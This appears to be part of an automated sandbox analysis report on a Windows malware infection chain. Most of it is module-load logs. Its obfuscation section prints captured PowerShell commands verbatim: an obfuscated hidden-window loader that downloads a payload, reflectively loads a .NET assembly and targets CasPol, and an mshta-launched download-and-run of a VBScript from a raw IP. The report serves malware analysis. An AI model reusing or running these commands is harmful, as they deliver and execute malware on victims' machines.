                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1711723967.000000000754A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2098398956.0000000006EB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2099153712.000000000742A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000009.00000002.2098398956.0000000006EB0000.00000004.00000800.00020000.00000000.sd
                    Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.pdb source: powershell.exe, 00000001.00000002.1818550362.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1713731202.00000000084D2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2098398956.0000000006EB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2099153712.000000000742A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2099153712.000000000742A000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"
